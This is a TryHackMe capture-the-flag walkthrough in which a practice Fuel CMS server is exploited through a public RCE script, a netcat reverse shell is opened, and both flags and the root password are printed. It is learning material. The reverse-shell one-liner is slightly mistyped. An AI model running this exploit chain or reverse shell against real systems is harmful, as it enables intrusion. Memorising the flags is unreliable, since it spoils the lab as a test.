Walkthrough : Priv Ctf22
Secuneus Room : TryHackme
Join Room : https://tryhackme.com/jr/secuneusctf
1. Firstly we will scan the IP address using Nmap which tell us that port 80 is Open.
2. Then we will visit the website running on the IP address, on the IP address there a website is running named as Fuel CMS.
3. So we search about the Fuel CMD.
4. After searching we find that the Fuel CMS is vulnerable to a remote code execution using a python file 47138.py which is available in the Linux.
5. Then we start editing the file in which e change the IP Address to our target IP.
6. After editing the file we can run it using the command “python2.7 47138.py”. It will not run in python3.
7. It will give us a CMD of the application.
8. Then we will use netcat to get the shell access.
9. We use netcat reverse shell command line from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet.
rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.47.96 4444 >/tmp/
╰─$ nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.47.96.
Ncat: Connection from 10.10.47.96 :47538.
/bin/sh: 0: can’t access tty; job control turned off
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ /usr/bin/script -qc /bin/shell /dev/null
10. This will give us the shell access.
11. Now we will search for the first flag in the normal user.
12. In the normal user there is a directory root which contain the file flag.txt which have the first flag which is: 6470e394cbf6dab6a91682cc8585059b
13. After this we have to install database in it as it was written on the website.
14. After installing the database we will find the root password which is mememe.
15. The we will be the root user and search for the root.txt file which contain the second flag which is: b9bbcb33e11b80be759c4e844862482d.